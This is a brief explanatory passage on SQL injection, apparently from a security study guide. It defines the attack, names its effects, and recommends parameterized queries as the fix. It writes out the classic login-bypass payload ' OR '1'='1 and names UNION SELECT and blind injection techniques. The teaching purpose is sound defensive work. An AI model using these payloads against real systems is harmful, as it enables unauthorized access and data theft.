SQL injection inserts malicious SQL code into queries through unsanitized user input — enabling authentication bypass, data extraction, data modification, and in some cases command execution.
Classic: ' OR '1'='1 in login bypasses authentication. UNION SELECT extracts data from other tables. Blind SQLi: infer data from true/false application responses. Prevention: parameterized queries/prepared statements (the ONLY reliable fix). Input validation is defense-in-depth, not the primary fix.